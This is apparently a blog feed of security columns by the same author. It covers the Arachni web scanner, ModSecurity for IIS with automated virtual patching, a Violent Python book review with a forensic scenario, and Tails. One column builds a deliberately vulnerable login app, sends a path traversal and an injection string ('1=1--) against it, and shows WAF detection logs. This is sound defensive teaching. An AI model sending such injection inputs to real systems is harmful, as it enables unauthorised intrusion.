This month’s issue kicks off a two part series on web application security flaw discovery and prevention, beginning with Arachni. As this month’s topic is another case of mailing lists facilitating great toolsmith topics, I’ll begin this month by recommending a few you should join if you haven’t already. The Web Application Security Consortium mailing list is a must, as are the SecurityFocus lists. I favor their Penetration Testing and Web Application Security lists but they have many others as well. As you can imagine, these two make sense for me given focuses on web application security and penetration testing, and it was via SecurityFocus that I received news of the latest release of Arachni. Arachni is a high-performance, modular, open source web application security scanning framework written in Ruby. It was refreshing to discover a web app scanner I had not yet tested. I spend a lot of time with the likes of Burp, ZAP, and Watobo but strongly advocate expanding the arsenal.
Arachni’s developer/creator is Tasos "Zapotek" Laskos, who kindly provided details on this rapidly maturing tool and project.
Via email, Tasos indicated that to date, Arachni's role has been that of an experiment/learning-exercise hybrid, mainly focused on doing things a little bit differently. He’s glad to say that the fundamental project goals have been achieved; Arachni is fast, relatively simple, quite accurate, open source and quite flexible in the ways which it can be deployed. In addition, as of late, stability and testing have been given top priority in order to ensure that the framework won't exhibit performance degradation as the code-base expands.
With a strong foundation laid and a clear road map, future plans for Arachni include pushing the envelope where version 0.4.2 include improved distributed, high-performance scan features such as the new, distributed crawler(under current development), and a new, cleaner, more stable and attractive Web User Interface, as well as general code clean-up.
Version 0.5 is where a lot of interesting work will take place as the Arachni team will be attempting to break some new ground with native DOM and JavaScript support, with the intent of allowing a depth/level of analysis beyond what's generally possible today, from either open source or commercial systems. According to Tasos, most, if not all, current scanners rely on external browser engines to perform their duties bringing with them a few penalties (performance hits, loss of control, limited inspection capabilities, design compromises, etc.), which Arachni will be able to avoid. This kind of functionality, especially from an open and flexible system, will be greatly beneficial to web application testing in general, and not just in a security-related context.

Arachni success stories include incredibly cool features such as WAF Realtime Virtual Patching. At OWASP AppSec DC 2012, Trustwave Spider Lab’s Ryan Barnett discussed the concept of dynamic application scanning testing (DAST) exporting data that is then imported into a web application firewall (WAF) for targeted remediation. In addition to stating that the Arachni scanner is an “absolutely awesome web application scanner framework” Ryan describes how to integrate export data from Arachni with ModSecurity, the WAF for which he is OWASP ModSecurity Core Rule Set (CRS) project leader. Take note here as next month in toolsmith we’re going to discuss ModSecurity for IIS as part two of this series and will follow Ryan’s principles for DAST to WAF.   
Other Arachni successes include highly-customized scripted audits and easy incorporation into testing platforms (by virtue of its distributed features).  Tasos has received a lot of positive feedback and has been pleasantly surprised there has not been one unsatisfied user, even in the Arachni's early, immature phases. Many Arachni users end up doing so out of frustration with the currently available tools and are quite happy with the results after giving Arachni a try given that Arachni gives users a decent alternative while simplifying web application security assessment tasks.
Arachni benefits from excellent documentation and support via its wiki, be sure to give a good once over before beginning installation and use.

Installing Arachni

On an Ubuntu 12.10 instance, I first made sure I had all dependencies met via sudo apt-get install build-essential libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev libyaml-dev zlib1g-dev ruby1.9.1-dev ruby1.9.1.
For developer’s sake, this includes Gem support so thereafter one need only issue sudo gem install arachni to install Arachni. However, the preferred method is use of the appropriate system packages from the latest downloads page.
While Arachni features robust CLI use, for presentation’s sake we’ll describe Arachni use with the Web UI. Start it via arachni_web_autostartwhich will initiate a Dispatcher and the UI server. The last step is to point your browser to http://localhost:4567, accept the default settings and begin use.

Arachni in use

Of interest as you begin Arachni use is the dispatcher which spawns RPC instances and allows you to attach to, pause, resume, and shutdown Arachni instances. This is extremely important for users who wish to configure Arachni instances in a high performance grid (think a web application security scanning cluster with a master and slave configuration). Per the wiki, “this allows scan-time to be severely decreased, by as much as n times less under ideal circumstances, where nequals the number of running instances.”   
You can configure Arachni’s web UI to run under SSL and provide HTTP Basic authentication if you wish to lock use down. Refer to the wiki entry for the web user interface for more details.
Before beginning a simple scan (one Dispatcher), let’s quickly review Arachni’s modules and plugins. Each has a tab in Arachni’s primary UI view. The  45 modules are divided into Audit (22) and Recon (23) options where the audit modules actively test the web application via inputs such as parameters, forms, cookies and headers while the recon modules passively test the web application, focusing on server configuration, responses and specific directories and files. I particularly like the additional SSN and credit card number disclosure modules as they are helpful for OSINT, as well as the Backdoor module, which looks to determine if the web application you’re assessing is already owned. Of note from the Audit options is the Trainer module that probes all inputs of a given page in order to uncover new input vectors and trains Arachni by analyzing the server responses. Arachni modules are all enabled by default. Arachni plugins offer preconfigured auto-logins (great when spidering), proxy settings, and notification options along with some pending plugins supported in the CLI version but not yet ready for the Web UI as of v.0.4.1.1
To start a scan, navigate to the Start a scan tab and confirm that a Dispatcher is running. You should see the likes of @localhost:7331 (host and port) along with number of running scans, as well as RAM and CPU usage. Then paste a URL into the URL form, and select Launch Scan as seen in Figure 1
 
Figure 1: Launching an Arachni scan

While the scan is running you can monitor the Dispatcher status via the Dispatchers tab as seen in Figure 2.

Figure 2: Arachni Dispatcher status
From the Dispatchers view you can choose to Attachto the running Instance (there will be multiples if you’ve configured a high performance grid) which will give a real-time view to the scan statistics, percentage of completion for the running instance, scanner output, and results for findings discovered as seen in Figure 3. Dispatchers provide Instances, Instances perform the scans.

Figure 3: Arachni scan status
Once the scan is complete, as you might imagine, the completed results report will be available to you in the Reports tab. As an example I chose the HTML output but realize that you can also select JSON, text, YAML, and XML as well as binary output such as Metareport, Marshal report, and even Arachni Framework Reporting. Figure 4 represents the HTML-based results of a scan against NOWASP Mutillidae.

Figure 4: HTML Arachni results
Even the reports are feature-rich with a summary tab with graphs and issues, remedial guidance, plugin results, along with a sitemap and configuration settings.
The results are accurate too; in my preliminary testing I found very few false positives. When Arachni isn’t definitive about results, it even goes so far as to label the result “untrusted (and may in fact be false positives) because at the time they were identified the server was exhibiting some kind of anomalous behavior or there was 3rd part interference (like network latency for example).” Nice, I love truth and transparency in my test results.
I am really excited to see Arachni work at scale. I intend to test it very broadly on large applications using a high performance grid. This is definitely one project I’ll keep squarely on my radar screen as it matures through its 0.4.2 and 0.5 releases.

In Conclusion

Join us again next month as we resume this discussion when take Arachni results and leverage them for Realtime Virtual Patching with ModSecurity for IIS. By then I will have tested Arachni’s clustering capabilities as well so we should have some real benefit to look forward to next month. Please feel free to seek support via the support portal, file a bug report via the issue tracker, or to reach out to Tasos via Twitter or email as he looks forward to feedback and feature requests.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Tasos "Zapotek" Laskos, Arachni project lead

CTIN Digital Forensics Conference - No fluff, all forensics

$
0
0
For those of you in the Seattle area or willing to travel who are interested in digital forensics there is a great opportunity to learn and socialize coming up in March.
The CTIN Digital Forensics Conference will be March 13 though 15, 2013 at the Hilton Seattle Airport & Conference Center. CTIN, the Computer Technology Investigators Network, is non-profit, free membership organization comprised of public and private sector computer forensic examiners and investigators focused on the areas of high-tech security, investigation, and prosecution of high-tech crimes for both private and public sector.

Topics slated for the conference agenda are many, with great speakers to discuss them in depth:
Windows Time Stamp Forensics, Incident Response Procedures, Tracking USB Devices, Timeline Analysis with Encase, Internet Forensics, Placing the Suspect Behind the Keyboard, Social Network Investigations, Triage, Live CDs (WinFE & Linux)
F-Response and Intella, Lab - Hard drive repair, Mobile Device Forensics, Windows 7/8 Forensics
Child Pornography, Legal Update, Counter-forensics, Linux Forensics, X-Ways Forensics
Expert Testimony, ProDiscover, Live Memory Forensics, Encase, Open Source Forensic Tools
Cell Phone Tower Analysis, Mac Forensics, Registry Forensics, Malware Analysis, iPhone/iPad/other Apple products, Imaging Workshop, Paraben Forensics, Virtualization Forensics


Register before 1 DEC 2012 for $295, and $350 thereafter.

While you don't have to be a CTIN member to attend I strongly advocate your joining and supporting CTIN.

toolsmith: ModSecurity for IIS

$
0
0


Part 2 of 2 - Web Application Security Flaw Discovery and Prevention

Prerequisites/dependencies
Windows OS with IIS (Win2k8 used for this article)
SQL Server Express 2004 SP4 and Management Studio Express for vulnerable web app
.NET Framework 4.0 for ModSecurity IIS

Introduction

December’s issue continues where we left off in November with part two in our series on web application security flaw discovery and prevention. In November we discussed Arachni, the high-performance, modular, open source web application security scanning framework. This month we’ll follow the logical work flow from Arachni’s distributed, high-performance scan results to how to use the findings as part of mitigation practices. One of Arachni’s related features is WAF Realtime Virtual Patching.
Trustwave Spider Lab’s Ryan Barnett has discussed the concept of dynamic application scanning testing(DAST) data that can be imported into a web application firewall (WAF) for targeted remediation. This discussion included integrating export data from Arachni into ModSecurity, the cross–platform, open source WAF for which he is the OWASP ModSecurity Core Rule Set (CRS) project leader. I reached out to Ryan for his feedback with particular attention to ModSecurity for IIS, Microsoft’s web server.
He indicated that WAF technology has gained traction as a critical component of protecting live web applications for a number of key reasons, including:
1)      Gaining insight into HTTP transactional data that is not provided by default web server logging
2)      Utilizing Virtual Patching to quickly remediate identified vulnerabilities
3)      Addressing PCI DSS Requirement 6.6
The ModSecurity project is just now a decade old (first released in November 2002), has matured significantly over the years, and is the most widely deployed WAF in existence protecting millions of websites. “Until recently, ModSecurity was only available as an Apache web server module. That changed, however, this past summer when Trustwave collaborated with the Microsoft Security Response Center (MSRC) to bring the ModSecurity WAF to the both the Internet Information Services (IIS) and nginx web server platforms.  With support for these platforms, ModSecurity now runs on approximately 85% of internet web servers.” 
Among the features that make ModSecurity so popular, there are a few key capabilities that make it extremely useful:
It has an extensive audit engine which allows the user to capture the full inbound and outbound HTTP data.  This is not only useful when reviewing attack data but is also extremely valuable for web server administrators who need to trouble-shoot errors.
·         It includes a powerful, event-driven rules language which allows the user to create very specific and accurate filters to detect web-based attacks and vulnerabilities.
·         It includes an advanced Lua API which provides the user with a full-blown scripting language to define complex logic for attack and vulnerability mitigation.
·         It also includes the capability to manipulate live transactional data.  This can be used for a variety of security purposes including setting hacker traps, implementing anti-CSRF tokens, or Cryptographic HASH tokens to prevent data manipulation.
In short, Ryan states that ModSecurity is extremely powerful and provides a very flexible web application defensive framework that allows organizations to protect their web applications and quickly respond to new threats.
I also sought details from Greg Wroblewski, Microsoft’s lead developer for ModSecurity IIS.
“As ModSecurity was originally developed as an Apache web server module, it was technically challenging to bring together two very different architectures. The team managed to accomplish that by creating a thin layer abstracting ModSecurity for Apache from the actual server API. During the development process it turned out that the new layer is flexible enough to create another ModSecurity port for the nginx web server. In the end, the security community received a new cross-platform firewall, available for the three most widely used web servers.
The current ModSecurity development process (still open, recently migrated to GitHub) preserves compatibility of features between three ported versions. For the IIS version, only features that rely on specific web server behavior show functional differences from the Apache version, while the nginx version currently lacks some of the core features (like response scanning and content injection) due to limited extensibility of the server. Most ModSecurity configuration files can be used without any modifications between Apache and IIS servers. The upcoming release of the RTM version for IIS will include a sample of ModSecurity OWASP Core Rule Set in the installer.

Installing ModSecurity for IIS

In order to test the full functionality of ModSecurity for IIS I needed to create an intentionally vulnerable web application and did so following guidelines provided by Metasploit Unleashed. The author wrote these guidelines for Windows XP SP2, I chose Windows Server 2008 just to be contrarian. I first established a Win2k8 virtual machine, enabled the IIS role, downloaded and installed SQL Server 2005 Express SP4, .NET Framework 4.0, as well as SQL Server 2005 Management Studio Express, then downloaded and the ModSecurity IIS 2.7.1 installer. We’ll configure ModSecurity IIS after building our vulnerable application. When configuring SQL Server 2005 Express ensure you enable SQL Server Authentication, and set the password to something you’ll use in the connection string established in Web.config. I used p@ssw0rd1 to meet required complexity. JNote: It’s “easier” to build a vulnerable application using SQL Server 2005 Express rather than 2008 or later; for time’s sake and reduced troubleshooting just work with 2005. We’re in test mode here, not production. That said, remember, you’re building this application to be vulnerable by design. Conduct this activity only in a virtual environment and do not expose it to the Internet. Follow the Metasploit guidelines carefully but remember to establish a proper connection string in the Web.config (line 4) and build it from this sample I’m hosting for you rather than the one included with the guidelines. As an example, I needed to establish my actual server name rather than localhost, I defined my database name as crapapp instead of WebApp per the guidelines, and used p@ssw0rd1 instead of password1 as described:
I also utilized configurations recommended for the pending ModSecurity IIS install so go with my version.
Once you’re finished with your vulnerable application build you should browse to http://localhost and first pass credentials that you know will fail to ensure database connectivity. Then test one of the credential pairs established in the users table, admin/s3cr3tas an example. If all has gone according to plan you should be treated to a successful login message as seen in Figure 1.

FIGURE 1: A successful login to CrapApp
ModSecurity IIS installation details are available via TechNet but I’ll walk you through a bit of it to help overcome some of the tuning issues I ran into. Make sure you have the full version of .NET 4.0 installed and patch it in full before you execute the ModSecurity IIS installer you downloaded earlier.
Download the ModSecurity OWASP Core Rule Set (CRS) and as a starting point copy the files from the base_rules to the crs directory you create in C:\inetpub\wwwroot. Also put the test.conffile I’m also hosting for you in C:\inetpub\wwwroot. This will call the just-mentioned ModSecurity OWASP Core Rule Set (CRS) that Ryan maintains and also allow you to drop any custom rules you may wish to create right in test.conf.
There are a few elements to be comfortable with here. Watch the Windows Application logs via Event Viewer to both debug any errors you receive as well as ModSecurity alerts once properly configured. I’m hopeful that the debugging time I spent will help save you a few hours, but watch those logs regardless. Also make regular use of the Internet Information Services (IIS) Manger to refresh the DefaultAppPool under Application Pools as well as restart the IIS instance after you make config changes. Finally, this experimental installation intended to help get you started is running in active mode versus passive. It will both detect and block what the CRS notes as malicious. As such, you’ll want to initially comment out all the HTTP Policy rules in order to play with the CrapApp we built above. To do so, open modsecurity_crs_30_http_policy.conf in the crs directory and comment out all lines that start with SecRule. Again, we’re in experiment mode here. Don’t deploy ModSecurity in production with the SecDefaultActiondirective set to "block" without a great deal of testing in passive mode first or you’ll likely blackhole known good traffic.

Using ModSecurity and virtual patching to protect applications

Now that we’re fully configured, I’ll show you the results of three basic detections then close with a bit of virtual patching for your automated web application protection pleasure. Figure 2 is a mashup of a login in attempt via our CrapApp with a path traversal attack and the resulting detection and block as noted in the Windows Application log.

FIGURE 2: Path traversal attack against CrapApp denied
Similarly, a simple SQL injection such as ‘1=1-- against the same form field results in the following Application log entry snippet:
[msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:txtLogin: '1=1--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]

Note the various tags including a match to the appropriate OWASP Top 10 entry as a well as the relevant section of the PCI DSS.
Ditto if we pop in a script tag via the txtLogin parameter:
[data "Matched Data: "] [ver "OWASP_CRS/2.2.6"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"]
    
Finally, we’re ready to connect our Arachni activities in Part 1 of this campaign to our efforts with ModSecurity IIS. There are a couple of ways to look at virtual patching as amply described by Ryan. His latest focus has been more on dynamic application scanning testing as actually triggered via ModSecurity. There is now Lua scripting that integrates ModSecurity and Arachni over RPC where a specific signature hit from ModSecurity will contact the Arachni service and kick off a targeted scan. At last check this code was still experimental and likely to be challenging with the IIS version of ModSecurity. That said we can direct our focus in the opposite direction to utilize Ryan’s automated virtual patching script, arachni2modsec.pl, where we gather Arachi scan results and automatically convert the XML export into rules for ModSecurity. These custom rules will then protect the vulnerabilities discovered by Arachni while you haggle with the developers over how long it’s going to take them to actually fix the code.
To test this functionality I scanned the CrapApp from Arachni instance on the Ubuntu VM I built for last month’s article. I also set the SecDefaultActiondirective set to "pass" in my test.conffile to ensure the scanner is not blocked while it discovers vulnerabilities. Currently the arachni2modsec.pl script writes rules specifically for SQL Injection, Cross-site Scripting, Remote File Inclusion, Local File Inclusion, and HTTP Response Splitting. The process is simple; assuming the results file is results.xml, arachni2modsec.pl –f results.xml will create modsecurity_crs_48_virtual_patches.conf. On my ModSecurity IIS VM I’d then copy modsecurity_crs_48_virtual_patches.conf into the C:\inetpub\wwwroot\crs directory and refresh the DefaultAppPool. Figure 3 gives you an idea of the resulting rule.  

FIGURE 3: arachni2modsec script creates rule for ModSecurity IIS
Note how the rule closely resembles the alert spawned when I passed the simple SQL injection attack to CrapApp earlier in the article. Great stuff, right?

In Conclusion

What a great way to wrap up 2012 with the conclusion of this two-part series on Web Application Security Flaw Discovery and Prevention. I’m thrilled with the performance of ModSecurity for IIS and really applaud Ryan and Greg for their efforts. There are a number of instances where I intend to utilize the ModSecurity port for IIS and will share feedback as I gather data. Please let me know how it’s working for you as well should you choose to experiment and/or deploy.
Good luck and Merry Christmas.
Stay tuned to vote for the 2012 Toolsmith Tool of the year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ryan Barnett, Trustwave Spider Labs, Security Researcher Lead
Greg Wroblewski, Microsoft, Senior Security Developer

Choose the 2012 Toolsmith Tool of the Year

$
0
0
Merry Christmas and Happy New Year! It's that time again.
Please vote below to choose the best of 2012, the 2012 Toolsmith Tool of the Year.
We covered some outstanding information security-related tools in ISSA Journal's toolsmith during 2012; which one do you believe is the best?
I appreciate you taking the time to make your choice.
Review all 2012 articles here for a refresher on any of the tools listed in the survey.
You can vote through January 31, 2013. Results will be announced February 1, 2013

Create your free online surveys with SurveyMonkey, the world's leading questionnaire tool.

toolsmith: Violent Python - A Book Review Applied to Security Analytics

$
0
0



Prerequisites/dependencies
Python interpreter
BackTrack 5 R3 is ideally suited to make immediate use of Violent Python scripts

Introduction
Happy New Year and congratulations on surviving the end of the world as we know it (nyah, nyah Mayan calendar). Hard to imagine we’re starting yet another year already; 2012 simply screamed by. Be sure to visit the HolisticInfoSec blog post for the 2012 Toolsmith Tool of the Year and vote for your favorite tool of 2012.
I thought I’d start off 2013 with a bit of a departure from the norm. Herein is the first treatment of a book as a tool where the content and associated code can be utilized to perform duties specific to the information security practitioner. I can think of no better book with which to initiate this approach than TJ O’Connor’s Violent Python, A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers. Yes, this implies that you should buy the book; trust me, it’s worth every dime of the $34. Better still, TJ has donated all his proceeds to the Wounded Warrior Project. That said, I’ll post TJ’s three scripts we’ll discuss here so as to whet your appetite. I’ve had the distinct pleasure of working with TJ as part of the SANS Technical Institute’s graduate program where we, along with Beth Binde, wrote AssessingOutbound Traffic to Uncover Advanced Persistent Threat. I’ve known some extremely bright capable information security experts in my day and I can comfortably say TJ is hands down amongst the very best of that small group. As part of his service as an officer in the U.S. Army (hooah) TJ has served as the course director for both computer exploitation and digital forensics at the US Military Academy and as an communications officer supporting tactical communications. His book maps nicely to a philosophy I embrace and incorporate in the workplace. Security monitoring, incident response (and forensics), and attack and penetration testing are the three pillars of security analytics, each feeding and contributing the others in close cooperation. As an example, capable security monitoring inevitably leads to a need for incident response, and after mitigation and remediation have ensued, penetration testing is key to validating that corrective measures were successful, which in turn helps the monitoring team assess and tune detection and alerting logic. Security analytics: the information security circle of life J.
How does a book such as TJ’s Violent Python reverberate with this philosophy? How about entire chapters dedicated to each of the above mentioned pillars, including Python scripts for network traffic analysis (monitoring), forensic investigations (IR), as well as web recon and penetration testing. We’ll explore one script from each discipline shortly, but not before hearing directly from the author:
“In a lot of ways writing a book is a cathartic experience where you capture a lot of things you have done. All too often I'm writing scripts to achieve an immediate effect and then I throw away the script. For me the book was an opportunity to capture a lot of those small projects I've done and simplify the learning curve for others. My favorite example was the UAV takeover in the book. We show how to take over any really Ad-Hoc WiFi toys in under 70 lines of code. A few friends joked that I couldn't write a script in under 100 lines to crash a UAV. This was my chance to provide them a working concept and it worked! Unfortunately it left my daughter with a toy UAV cracked into several pieces as I refined the code. From a defensive standpoint, understanding a scripting language is absolutely essential in my opinion. The ability to parse data such as DNS traffic or geo-locate IP traffic (both shown in the book) can give a great deal of visibility. Forensics tools are great but the ability to build your own are even better. We show how to write tools to parse out iPhone backups for data and scrape for specific objects. The initial feedback from the book has been overwhelming and I've really enjoyed hearing positive feedback. No future plans right now but a good friend of mine has mentioned writing "Violent Powershell" so we'll see where that goes.”    
Violent Pythonprovides readers the basis for scripts to attack network services, analyze digital artifacts, investigate network traffic for malicious activity, and data-mine social media, not to mention numerous other activities. This is a must-read book that includes a companion site with all the code discussed. Let’s take a closer look at three of these efficient and useful Python scripts.

Making Use of Violent Python

As noted above, I’ve posted the three scripts discussed in this section, along with the PCAP and PDF (malicious) discussed on my website. Email or Tweet for the zip passwords.
TJ suggests utilizing a BackTrack distribution given that many of the dependencies and libraries required to use the scripts in this book are inherent to BackTrack. We’ll follow suit on a BackTrack 5 R3 virtual machine. Before beginning, we’ll need to set up a few prerequisites. Execute easy_install pyPDF python-nmap pygeoip mechanize BeautifulSoup4 at the BT5R3 root prompt. This will install pygeoip as needed for our first exercise. I’m going to conduct these exercises a bit out of chapter sequence in order to follow the security analytics lifecycle starting with monitoring. This drops us first into Chapter 4 where we’ll utilize MaxMind’s GeoLiteCity to map IP addresses to cities. In order to do so, you’ll need to set up GeoLiteCity on BackTrack or your preferred system with the following steps:
1.  mkdir /opt/GeoIP
2.  cd /opt/GeoIP/
3.  wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
4.  gunzip GeoLiteCity.dat.gz
You’ll then need to edit line 7 of geoPrint.py to read gi = pygeoip.GeoIP('/opt/GeoIP/GeoLiteCity.dat')or download the updated copy of the script I’ve posted for you.

I’ve created a partially arbitrary scenario for you with which to walk through the security analytics lifecycle using Violent Python. To do so I’ll refer to what was, in 2009 an actual malicious domain, used to host shellcode for PDF-based malware attacks. I grabbed a malicious PDF sample from Contagio, an excellent sample resource. The IP address I associate with this domain is where I am taking creative liberties as the domain we’ll discuss, ax19.cn, no longer exists, and there is no record of what its IP address was when it was in use. The PCAP we’ll use here is one I edited with bittwiste to arbitrarily introduce a suspect Chinese IP address to what was originally a packet capture from a machine compromised by Win32.Banload.MC. I’ve shared this PCAP and the PDF as mentioned above so you can try the Python scripts with them for yourself.  
In this scenario, your analysis machine is Linux only. Just you, a Python interpreter, and a shell; no fuss, no muss.
As we’re starting in the monitoring phase, imagine you have a network for which the traffic baseline is well understood. You can assert, from one particular high value VLAN, that at no time should you ever see traffic bound for China.  Your netflow monitoring for that VLAN is showing far more egress traffic bound for IP space that is not on your approved list established from learned baselines. You initiate a real-time packet capture to confirm. Capture (suspect.pcap) in hand, you’d like to validate that the host is indeed conversing with an IP address in China. Violent Python’s geoPrint.py script is a great place to start as it leverages the above-mentioned GeoLiteCity data from MaxMind along with the PyGeoIP library from Jennifer Ennis and dpkt. Execute python geoPrint.py -p suspect.pcap and you’ll see results as noted in Figure 1.

Figure 1: geoPrint.py confirms Chinese takeout
Your internal host (RFC 1918, and thus unregistered) with IP address 192.168.248.114 is clearly conversing with 116.254.188.24 in Beijing. Uh-oh.
Your team now moves into incident response mode and seizes the host in question. You interview the system’s user who indicates they received an email what the user thought was a legitimate help desk notification to read a new policy. The email had an attached PDF file which the user downloaded and opened. Your suspicions are heightened, as such you grab a copy of the PDF and head back to your analysis workstation. You’re interested to see if there is any interesting metadata in the PDF that might help further your investigation. You refer to Chapter 3 of Violent Python which discusses Forensic Investigations with Python. The pdfRead.pyscript incorporates the PyPDF library which allows you to extract PDF document information (metadata) in addition to other capabilities. Execute python pdfRead.py -F suspect.pdf and dump the metadata as seen in Figure 2.

Figure 2: pdfRead.py dumps suspect PDF metadata
The author reference is a standout for you; from a workstation with a browser you search “Zeon Technical Publications” and find reference to it on VirusTotal and JSunpack; these results along with a quick MD5sum hash match indicate that this PDF is clearly malicious. The JSunpack reference indicates that shellcode phones home to www.ax19.cn (see Figure 3), a domain for which you’d now like to learn more.

Figure 3: JSunpack confirms an evil PDF
You could have sought anonymity to conduct the above mentioned search, which lead us to the third pillar of our security analytics lifecycle. This third phase here includes web recon as discussed in Chapter 6 of Violent Python, a common step in the attack and penetration testing discipline, to see what more we can learn about this malicious domain. As we often seek anonymity during the recon phase, Violent Python allows you maintain a bit of stealth by leveraging the deprecated Google API against which a few queries a day can still be executed. The newer API requires a developer’s key which one can easily argue is not anonymous. Executing python anonGoogle.py -k 'www.ax19.cn'will return yet another validating result as seen in Figure 4.

Figure 4: anonGoogle matches ax19.cn to malicious activity
With seven rich chapters of Python goodness, TJ’s Violent Pythonrepresents a golden opportunity to expanding your security analytics horizons. There is so much to learn from here while accentuating your use of Python in your information security practice.

In Conclusion

I’m hopeful this slightly different approach to toolsmith was useful for you this month. I’m looking to shake things up a bit here in 2013 and am certainly open to suggestions you may have regarding ideas and approaches to doing so. Violent Pythonwas a great read for me and a pleasure to put to use for both this article as well as in my personal tool box. I’m certain you’ll find this book equally useful.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

TJ O’Connor, Violent Python author
Mila Parkour, Contagio

Follow up on C3CM: Pt 2 – Bro with Logstash & Kibana (read Applied NSM)

$
0
0
In September I covered using Bro with Logstash and Kibana as part of my C3CM (identify, interrupt, and counter the command, control, and communications capabilities of our digital assailants)series in toolsmith. Two very cool developments have since taken place that justify follow-up:

1) In November Jason Smith (@automayt)  posted Parsing Bro 2.2 Logs with Logstash on the Applied Network Security Monitoring blog. This post exemplifies exactly how to configure Bro with Logstash and Kibana, and includes reference material regarding how to do so with Doug Burk's (@dougburks) Security Onion (@securityonion).

2) Additionally, please help me in congratulating Chris Sanders (@chrissanders88), lead author, along with contributing authors, the above-mentioned Jason Smith, as well as David Bianco (@DavidJBianco)  and Liam Randall (@hectaman),  on the very recent publication of the book the Applied NSM blog supports: Applied Network Security Monitoring: Collection, Detection, and Analysis, also available directly from Syngress.

Chris is indeed a packet ninja, a fellow GSE, and is quite honestly a direct contributor to how I passed that extremely challenging certification. His Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems is an excellent book and was a significant part of my study and practice for the GSE process. As such, while I have not yet read it, I am quite confident that Applied Network Security Monitoring: Collection, Detection, and Analysis will be of great benefit to all who purchase and read it. Let me be more clear, at the risk of coming off as an utter fanboy. I read Chris'Practical Packet Analysis as part of my studies for GSE | passed GSE as part of STI graduate school requirements | finished graduate school. :-)
Congratulations, Chris and team, well done, and thank you.

Merry Christmas all, and cheers.

toolsmith: Tails - The Amnesiac Incognito Live System

$
0
0

Privacy for anyone anywhere



Prerequisites/dependencies
Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM

Introduction
“We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.”  -Edith Lovejoy Pierce

First and foremost, Happy New Year!
If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part.
In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as a “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.”Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers."
I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it.  Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time.

Tails
Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance. “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.”
Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume, just remember to format the USB media in a manner that leaves room to create the persistent volume.
